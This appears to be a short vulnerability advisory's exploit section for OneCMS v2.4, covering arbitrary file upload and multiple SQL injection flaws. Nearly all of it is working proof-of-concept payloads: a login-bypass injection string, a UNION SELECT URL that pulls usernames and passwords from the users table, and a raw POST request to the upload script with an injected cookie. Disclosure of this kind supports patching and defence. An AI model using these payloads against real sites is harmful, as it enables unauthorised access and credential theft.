• info
• discussion
• exploit
• solution
• references

OneCMS Arbitrary File Upload Vulnerability and Multiple SQL-injection Vulnerabilities

An attacker can use a browser to exploit these issues.

The following proofs of concept are available:

SQL-injection attack:

Username: admin' or 1=1 /*
Password: something

http://www.example.com/OneCMS_v2.4/staff.php?user=aaa' union select
1,username,password,1,1,1,1,1,1,1,1,1,1 from onecms_users/* '

Arbitrary-file-upload attack:

POST /OneCMS_v2.4/a_upload.php?view=add2 HTTP/1.0
Cookie: username=admin'or 1=1/*;
password=96e79218965eb72c92a549dd5a330112; login_date=1199693273;
style=Trend